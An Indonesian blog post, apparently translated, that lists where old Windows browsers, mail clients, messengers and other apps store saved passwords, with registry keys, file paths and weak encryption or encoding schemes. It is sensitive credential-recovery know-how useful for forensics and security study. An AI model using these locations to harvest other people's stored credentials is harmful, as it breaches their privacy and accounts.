Namun hal ini penting untuk diketahui dimana informasi rahasia ini jika berada ditangan orang lain baik disengaja atau tidak dan taruhannya privasi kita yang beresiko diketahui. Beberapa aplikasi mengambil kepedulian terhadap informasi sensitif dari ‘mata-mata’ nakal, Tetapi sebagian besar aplikasi menggunakan metode sederhana atau tepatnya metode tak jelas untuk menyimpan mandat (informasi rahasia) yang dengan mudah dapat menempatkan privasi Anda dalam bahaya karena setiap spyware pada sistem Anda dapat dengan mudah mengungkap rahasia-rahasia ini. Juga sama benar dengan siapa saja yang memiliki akses ke sistem anda.
Dalam artikel ini, kita akan membahas dan mengungkapkan tempat rahasia dimana aplikasi menyimpan password dan informasi penting lainnya, juga teknik enkripsi yang diterapkan pada masing2 aplikasi populer saat ini. juga akan disajikan petunjuk tentang bagaimana seseorang dapat menemukan password tersebut menggunakan alat-alat yang tersedia saat ini.
Password Rahasia Aplikasi Windows
Berikut adalah daftar aplikasi yang populer jatuh ke dalam berbagai kategori seperti browser internet, klien Email, Instant Messenger dll, sandi rahasia yang terekspos di bawah ini.
Internet Browsers
  1. Firefox
    2. Firefox dengan versi 3.5 dan versi sebelumnya menyimpan sign-on password di file ‘signons.txt‘ yang terletak di direktori profilnya. Dengan versi 3.5 dan versi seterusnya Firefox mulai menyimpan ‘signons.sqlite‘ sign-on password di file database bernama Sqlite. Password yang disimpan dalam sign-on file yang dienkripsi menggunakan Triple-DES diikuti oleh mekanisme pengkodean BASE64.
    Berikut adalah lokasi default direktori profil Firefox,
    [Windows XP]
C:\Documents and Settings\<user_name>\Application Data\Mozilla\Firefox\Profiles\<random_name>.default
 
[Windows Vista & Windows 7]
C:\Users\<user_name>\AppData\Roaming\Mozilla\Firefox\Profiles\<random_name>.default
    Firefox menyediakan opsi perlindungan tambahan yang dinamakan “master password” untuk mencegah pengguna berbahaya dari menemukan sign-on password ini. sebagai Master Password tersebut tidak disimpan langsung dimana saja tetapi ini salah satu cara hash dan informasi terkait lainnya disimpan dalam file key3.db dalam direktori profil.
  2. Flock
    3. Flock Browser menggunakan format penyimpanan yang sama & mekanisme enkripsi seperti Google Chrome.
    Ini menyimpan password login website dalam file database sqlite yang disebut ‘Login Data‘ di lokasi profil berikut:
    [Windows XP]
C:\Documents and Settings\<user_name>\Local Settings\Application Data\Flock\User Data\Default
 
[Windows Vista & Windows 7]
C:\Users\<user_name>\Appdata\Local\Flock\User Data\Default
    Setiap sign-on yang tersimpan masuk terutama berisi URL situs web, id username dasar, username, password id dan kata sandi terenkripsi.
  3. Internet Explorer
    4. Internet Explorer menyimpan dua jenis password, password sign-on dan otentikasi HTTP dasar (biasanya proxy, router konfigurasi). IE dibawah versi 7 menyimpan baik sign-on dan password otentikasi HTTP dasar di lokasi yang aman yang dikenal sebagai ‘Protected Storage‘ di lokasi registri berikut:
    HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider
    Dengan versi IE 7 dan seterusnya menggunakan mekanisme baru untuk menyimpan sign-on password. Kata sandi terenkripsi untuk setiap situs web disimpan bersama dengan hash dari URL situs web di lokasi registri berikut:
    HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2
    Juga IE 7 dan seterusnya, HTTP password otentikasi dasar disimpan di ‘Credentials store‘ di lokasi berikut berdasarkan pada sistem operasi:
    [Windows XP]
C:\Documents and Settings\[username]\Application Data\Microsoft\Credentials
 
[Windows Vista and Windows 7]
C:\Users\[username]\AppData\Roaming\Microsoft\Credentials
  4. Google Chrome
    5. Google Chrome menyimpan semua sign-on password di file database sqlite disebut ‘Web Data‘ dalam direktori profil. Versi yang lebih baru menggunakan file ‘Data Login‘ untuk menyimpan password login. Berikut adalah lokasi default direktori profil Chrome:
    [Windows XP]
C:\Documents and Settings\<user_name>\Local Settings\Application Data\Google\Chrome\User Data\Default
 
[Windows Vista & Windows 7]
C:\Users\<user_name>\Appdata\Local\Google\Chrome\User Data\Default
    Setiap sign-on masuk yang tersimpan terutama berisi URL situs web, id username dasar, username, password id dan kata sandi terenkripsi.
  5. Google Chrome Canary atau SXS
    6. Google Chrome Canary atau SXS adalah versi uji paralel Chrome dimana pengguna dapat men-download dan menguji, dengan membantu Google untuk merilis versi stabil dari Chrome.
    Seperti Chrome, ternyata juga menyimpan semua sign-on password di file database sqlite disebut ‘Web Data‘ dalam direktori profil. Versi yang lebih baru menggunakan file ‘Data Login’ untuk menyimpan password login. Namun lokasi profil Chrome Canary dibuat sedikit berbeda, ini dia lokasinya:
    [Windows XP]
C:\Documents and Settings\<user_name>\Local Settings\Application Data\Google\Chrome SXS\User Data\Default
 
[Windows Vista & Windows 7]
C:\Users\<user_name>\Appdata\Local\Google\Chrome SXS\User Data\Default
    Juga menggunakan teknik penyimpanan yang sama dan mekanisme enkripsi seperti Chrome. Setiap sign-on yang tersimpan masuk terutama berisi URL situs web, id username dasar, username, password id dan password terenkripsi.
  6. Opera
    7. Opera menyimpan password login dalam format yang dienkripsi ‘Magic Wand File‘ dipanggil ‘Wand.dat‘ di dalam direktori profilnya. Lokasi profil yang berbeda untuk berbagai versi Opera seperti yang ditunjukkan di bawah ini:
    Untuk Versi Opera 10 dan keatas
    [Windows NT/2K/2k3/XP]
C:\Documents and Settings\<username>\Application Data\Opera\Opera\wand.dat
 
[Windows Vista/Windows 7]
C:\users\<username>\AppData\Roaming\Opera\Opera\wand.dat
    Untuk Versi Opera dibawah 10
    [Windows NT/2K/2k3/XP]
C:\Documents and Settings\<username>\Application Data\Opera\Opera\profile\wand.dat
 
[Windows Vista/Windows 7]
C:\users\<username>\AppData\Roaming\Opera\Opera\profile\wand.dat
    File Wand terutama berisi URL situs web, username dan informasi password yang dienkripsi dengan menggunakan algoritma Triple-DES.
  7. Safari
    8. Safari menggunakan format penyimpanan yang kuat dan mekanisme enkripsi untuk secara aman menyimpan password login website. Password Login bersama dengan informasi lainnya yang disimpan pada file ‘keychain.plist‘ di lokasi berikut:
    [Windows XP]
C:\Documents and Settings\<user_name>\Application Data\Apple Computer\Preferences
 
[Windows Vista & Windows 7]
C:\Users\<user_name>\Appdata\AppData\Roaming\Apple Computer\Preferences
    File “Keychain” menggunakan “binary Property List format” (biasanya ditemukan di MAC) yang berisi informasi seperti nama situs server, login user & password terenkripsi. Sandi dienkripsi menggunakan fungsi Kriptografi dengan nilai garam untuk membuatnya tetap kuat.
Email Klien
  1. ThunderBird
    2. ThunderBird menyimpan semua ingatan setting email bersama dengan sandi file database SQLite menjadi ‘signons.sqlite‘ di lokasi profilnya. lokasi Profil default untuk platform yang berbeda seperti tertera dibawah ini:
    [Windows XP]
C:\Documents and Settings\<user_name>\Application Data\Thunderbird\Profiles\<random_name>.default
 
[Windows Vista & Windows 7]
C:\Users\<user_name>\AppData\Roaming\Thunderbird\Profiles\<random_name>.default
  2. Microsoft Outlook
    3. Versi yang lebih baru Outlook mulai dari tahun 2002 sampai versi terbaru 2010, menyimpan password (selain exchange server) untuk berbagai akun email seperti POP3, IMAP, SMTP, HTTP di lokasi registri berikut:
    [Windows NT sebelumnya]
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
 
[Windows NT seterusnya]
HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles
    Versi lebih baru dari Outlook 2002-2010 menyimpan password server Exchange di ‘Credential Store‘ karena menyediakan perlindungan lebih baik dari metode lain.
    Outlook Versi lama (Outlook Express, 98, 2000 dll) menyimpan informasi konfigurasi email beserta sandi yang dienkripsi pada lokasi registri berikut:
    [Untuk Outlook terinstal di Internet Hanya pada Mode Konfigurasi Mail]
HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
 
[Untuk Outlook dalam mode normal]
HKCU\Software\Microsoft\Internet Account Manager\Accounts
  3. Gmail Notifier
    4. Gmail Notifier menggunakan mekanisme yang berbeda untuk menyimpan password account Google berdasarkan pada versi IEi. Untuk IE versi 7 dan seterusnya, Gmail Notifier menyimpan kata sandi dalam ‘Windows Credential Store‘. Password ini dapat didekripsi dengan menggunakan fungsi API CredEnumerate.
Instant Messengers
  1. Google Talk (GTalk)
    2. Google Talk (GTalk) menyimpan semua ingatan informasi account gmail di lokasi registri berikut:
    HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
    Untuk setiap account Google kunci registri dibuat terpisah dengan email account id sebagai nama dalam kunci ini. Password Account dienkripsi dan disimpan dalam nilai string registry bernama ‘pw‘ dalam account kunci registri ini.
  2. Windows Live Messenger
    3. Windows Live Messenger menyimpan password account di ‘Credential Store’ yang menyediakan mekanisme yang berbeda seperti ‘Generic’, ‘Domain Network’, ‘Domain Visible Network’ dll, dimana aplikasi yang dapat digunakan untuk menyimpan dan mengambil mandat pribadi mereka. Setiap metode tersebut membutuhkan teknik yang berbeda dan tingkat hak istimewa untuk menghitung dan mendekripsikan password.
    Windows Live Messenger menggunakan mekanisme ‘Generik Password‘ dari ‘Credential Store‘ untuk menyimpan password dengan nama target ‘WindowsLive:name=‘.
  3. MSN Messneger
    4. MSN Messenger juga menggunakan ‘Credential Store‘ untuk menyimpan dengan aman password yang diingat. Kata sandi ini disimpan sebagai ‘Domain Visible Network‘ aka ‘.Net Passport‘ menggunakan nama target sebagai ‘.Net passport‘ dalam ‘Credential Store‘.
  4. Yahoo Messenger
    5. Yahoo Messenger sebelum versi 7 menyimpan sandi pada nilai registry ‘EOptions String‘ di lokasi registri berikut:
    HKEY_CURRENT_USER\Software\Yahoo\Pager
    Password ini dienkripsi dan kemudian dikodekan menggunakan algoritma Yahoo64 (mirip dengan Base64) dan disimpan di lokasi di atas. Algoritma aktual dan fungsi pengkodean hadir dalam ycrwin32.dll (dapat ditemukan di lokasi terpasangnya Yahoo Messenger).
    Untuk versi 7 dan seterusnya, Penyimpanan bukti terenkripsi Yahoo yang berasal dari username & password pada nilai registry ‘ETS’ pada lokasi registri yang sama. Meskipun Anda tidak dapat mendekripsi kembali tanda ini ke sandi tetapi Anda dapat menyalinnya ke komputer lain dan dipakai terus untuk login ke Yahoo Messenger.
  5. Skype
    6. Skype tidak menyimpan password secara langsung. Sebaliknya menyimpan hash terenkripsi dari password di ‘config.xml yang berlokasi di direktori profil pengguna Skype. Direktori profil pengguna Khas untuk Skype adalah sebagai berikut:
    [Windows XP]
C:\Documents and Settings\<user_name>\Application Data\Skype\<account_name>
 
[Windows Vista & Windows 7]
C:\Users\<username>\AppData\Roaming\Skype\<account_name>
    Config.xml ini berisi label yang berisi “hash” terenkripsi dari password. Sesuai laporan penelitian ‘Vanilla Skype‘ ditulis oleh Fabrice Desclaux dan Kostya Kortchinsky, Skype menggunakan hash MD5 dari string “username\nskyper\npassword” untuk otentikasi. Jika pengguna telah menetapkan pilihan ‘Remember password‘ maka ini MD5 hash dienkripsi menggunakan algoritma AES-256 & SHA-1 dan akhirnya disimpan ke file ‘config.xml‘.
    Karena Hash dari password tersebut disimpan, tidak mungkin untuk langsung mendapatkan password. Sebaliknya kita harus menggunakan kamus atau pendekatan brute force untuk mengetahui password yang benar dari hash. Pendekatan ini mungkin waktu berhari-hari atau bulan bersama-sama berdasarkan pada panjang dan kompleksitas dari password.
  6. AIM (AOL Instant Messenger)
    7. AIM versi 6 dan seterusnya menyimpan password di lokasi registri berikut:
    HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords
    AIM versi PRO menggunakan lokasi registri yang berbeda untuk menyimpan password:
    HKEY_CURRENT_USER\Software\AIM\AIMPRO\<Account_Name>
    AIM menggunakan algoritma Blowfish untuk mengenkripsi password dan kemudian encode dengan menggunakan metode BASE64. Kata sandi yang dihasilkan disimpan pada lokasi registri di atas.
  7. Trillian
    8. [Version 4.21 build 24] – [Version 5.0.0.26]
    Trillian Astra hanya menyimpan password account utama (disebut sebagai password atau Identity Astra) di file ‘accounts.ini‘ di lokasi yang disebutkan di bawah ini. Tapi semua password account IM lainnya (seperti Yahoo, Gtalk, AIM, MSN dll) disimpan di server.
    [Windows XP]
C:\Documents and Settings\<user_name>\Application Data\Trillian\users\global\
 
[Windows Vista & Windows 7]
C:\Users\<username>\AppData\Roaming\Trillian\users\global\
    Untuk setiap account mengandung bagian bernama ‘[Account ]‘ dimana semua informasi account yang disimpan. Username disimpan di bidang bernama ‘Account =‘ dan password disimpan dalam bidang ‘Password =‘. Trillian pertama kali melakukan pengkodean XOR dari password dengan pola standar dan kemudian encode dengan BASE64 sebelum menyimpannya.
  8. Pidgin (Sebelumnya Gaim)
    9. Pidgin menyimpan semua password account dikonfigurasi di file “Accounts.xml” terletak di direktori berikut:
    [Windows XP]
C:\Documents and Settings\<user_name>\Application Data\.purple
 
[Windows Vista & Windows 7]
C:\Users\<username>\AppData\Roaming\.purple
    Versi yang lebih lama (Gaim) menggunakan .gaim folder sebagai pengganti .purple untuk menyimpan rincian account. Untuk setiap account yang tersimpan, berisi file ‘Accounts.xml’ label , yang memiliki label sub & berisi alamat account email dan password dalam masing-masing teks biasa.
  9. Digsby
    10. Versi yang lebih baru Digsby (Build 83 – r27225 sampai tulisan ini) menyimpan password account utama dalam file ‘logininfo.yaml‘ di lokasi berikut:
    [Windows XP]
C:\Documents and Settings\<user_name>\Local Settings\Application Data\Digsby
 
[Windows Vista & Windows 7]
C:\Users\<user_name>\AppData\Local\Digsby
    Digsby menyimpan hanya sandi account lokal utama dan semua password account IM lainnya (seperti Yahoo, Gmail, AIM) disimpan di server. Sandi utama Digsby dienkripsi menggunakan algoritma khusus dengan nama pengguna, jendela produk id, tanggal instal sebagai password kunci dan yang dihasilkan kemudian dikodekan dengan BASE64 sebelum disimpan ke dalam file password di atas.
    Versi Digsby Sebelumnya menyimpan sandi pada file ‘Digsby.dat‘ pada lokasi berikut:
    [Windows XP]
C:\Documents and Settings\<user_name>\Application Data\Digsby
 
[Windows Vista & Windows 7]
C:\Users\<user_name>\AppData\Roaming\Digsby
    Versi Digsby Sebelumnya menggunakan string hardcoded ‘foo‘ sebagai kunci tanpa pengkodean BASE64.
  10. PaltalkScene
    11. PaltalkScene menyimpan sandi account utama di lokasi registri berikut:
    HKEY_CURRENT_USER\Software\Paltalk\<nick_name>
    Password dienkripsi dan disimpan dalam nilai registri ‘pwd‘ di bawah kunci ini. Semua password IM lain seperti Gmail, Yahoo, AIM dll tersimpan dalam sub kunci terpisah di bawah kunci registri ini. Misalnya account Gmail disimpan dalam kunci registri berikut:
    HKEY_CURRENT_USER\Software\Paltalk\<nick_name>\GGL\<gmail_address>
    Semua password IM dikodekan dengan BASE64 dan disimpan dalam nilai registry ‘pwd‘.
  11. Beyluxe Messenger
    12. Beyluxe Messenger menyimpan sandi account utama di lokasi registri berikut:
    HKEY_CURRENT_USER\Software\Beyluxe Messenger\<nick_name>
    Password untuk setiap pengguna dienkripsi dan disimpan dalam nilai registri ‘password‘ di bawah kunci ini.
  12. MySpace IM
    13. MySpaceIM adalah salah satu instant messenger mendatang yang menyimpan user account & password rincian di lokasi berikut:
    [Windows XP]
C:\Documents and Settings\<user_name>\Application Data\MySpace\IM\users.txt
 
[Windows Vista & Windows 7]
C:\Users\<user_name>\AppData\Roaming\MySpace\IM\users.txt
    Para pengguna login id email disimpan dalam teks yang jelas di mana sebagai password dalam format terenkripsi. Kata sandi dienkripsi menggunakan fungsi ‘Windows Crypto API’ dan kemudian dikodekan menggunakan algoritma BASE64 sebelum disimpan ke dalam file ini. Jadi untuk mendekripsi dengan sukses kita harus memecahkan kode password menggunakan BASE64 dan kemudian mendekripsi menggunakan fungsi CryptUnprotectData.
  13. Miranda IM
    14. Miranda merupakan messenger berbasis open source populer belakangan ini. Seperti kebanyakan instant messenger, Miranda juga menyimpan semua informasi akun pengguna termasuk password di lokasi profil. Hal ini untuk menbantu pengguna dari mengetikkan password setiap kali.
    Versi terbaru dari Miranda (v0.9.10) menyimpan user account & password pada file profile di lokasi berikut:
    [Windows XP]
C:\Documents and Settings\<user_name>\Application Data\Miranda\%profile_name%\%profile_name%.dat
 
[Windows Vista & Windows 7]
C:\Users\<username>\AppData\Roaming\Miranda\%profile_name%\%profile_name%.dat
    Pengguna dapat memiliki beberapa profil khusus di lingkungan kantor atau rumah dan informasi account yang sesuai disimpan dalam file profil masing-masing.
    Versi awal dari Miranda menyimpan semua informasi account dalam file dat langsung. dalam basis lokasi seperti yang ditunjukkan di bawah ini:
    [Windows XP]
C:\Documents and Settings\<user_name>\Application Data\Miranda\<profile_name>.dat
 
[Windows Vista & Windows 7]
C:\Users\<user_name>\AppData\Roaming\Miranda\<profile_name>.dat
    Miranda menggunakan mekanisme milik sendiri untuk mengenkripsi password sebelum menyimpan ke dalam file profil.
Aplikasi Lainnya
  1. FileZilla
    2. FileZilla menyimpan semua informasi account bersama dengan username & password di file “recentservers.xml” di lokasi berikut:
    [Windows XP]
C:\Documents and Settings\<user_name>\Application Data\FileZilla
 
[Windows Vista & Windows 7]
C:\Users\<username>\AppData\Roaming\FileZilla
    File Xml ini berisi entri untuk setiap account server ftp dengan label . Untuk setiap entri server, ada & label yang berisi nama pengguna dan password dalam teks biasa untuk server FTP yang sesuai.
  2. Remote Desktop
    3. Remote Desktop menyimpan mandat disimpan di ‘Credential Store‘ menggunakan nama target sebagai ‘LegacyGeneric: target = TERMSRV / ‘. Seperti banyak aplikasi menggunakan ‘Credential Store‘ untuk menyimpan password mereka, nama target ini bisa digunakan untuk secara unik mengidentifikasi ‘Remote Desktop’ password tersimpan.
  3. Google Desktop Search
    4. Google Desktop Search menyimpan informasi account Google dalam registri ketika dikonfigurasi untuk mencari account Gmail. Berikut adalah lokasi registrinya:
    HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes\Gmail
    Kunci registri di atas berisi 2 nilai registry utama, ‘POP3_name‘ & ‘POP3_credentials‘ memegang nama account Google & password yang masing-masing terenkripsi.
  4. Picasa
    5. Google Picasa menyimpan informasi password account di salah satu lokasi registri berikut:
    HKEY_CURRENT_USER\Software\Google\Picasa\Picasa2\Preferences
HKEY_CURRENT_USER\Software\Google\Picasa\Picasa3\Preferences
    Beberapa rilis awal versi Picasa 3 yang digunakan adalah lokasi kedua, tetapi kemudian beralih kembali ke lokasi sebelumnya itu sendiri. Nilai registry ‘gaiaEmail‘ berisi id akun Google dan ‘gaiaPass‘ berisi password terenkripsi. Picasa versi 2 dan 3 menggunakan mekanisme enkripsi yang berbeda untuk menyimpan password.
  5. TweetDeck
    6. TweetDeck merupakan salah satu klien Twitter populer yang juga mendukung jaringan situs sosial lain seperti Facebook, LinkedIn, MySpace, Buzz dll, dikembangkan menggunakan Adobe Air framework dan karena itu menggunakan Encrypted Local Storage (ELS) mekanisme yang disediakan oleh Adobe Air untuk menyimpan semua kredensial account. File-file password yang terenkripsi disimpan di lokasi berikut berdasarkan pada platform:
    [Windows XP]
C:\Documents and Settings\<user_name>\Application Data\Adobe\AIR\ELS\TweetDeckFast.FFF259DC0CE2657847BBB4AFF0E62062EFC56543.1
 
[Windows Vista & Windows 7]
C:\Users\<user_name>\AppData\Roaming\Adobe\AIR\ELS\TweetDeckFast.FFF259DC0CE2657847BBB4AFF0E62062EFC56543.1
    Pada Windows, Adobe AIR menggunakan fungsi DPAPI untuk mengenkripsi kredensial menggunakan algoritma AES-CBC 128 bit . Berikut adalah urutan khas yang umumnya digunakan untuk menyimpan data rahasia:
    var strToEncrypt:String = "passw0rd";
 
var myByteArray:ByteArray = new ByteArray();
 
myByteArray.writeUTFBytes(strToEncrypt);
 
EncryptedLocalStore.setItem("securityxploded", myByteArray);
    Demikian rangkuman tentang lokasi dimana aplikasi yang populer saat ini menyimpan passwordnya.
Read more »
Powered by Blogger.

 
Design by Free WordPress Themes | Bloggerized by Iptek-4u - Premium Blogger Themes | Best Buy Coupons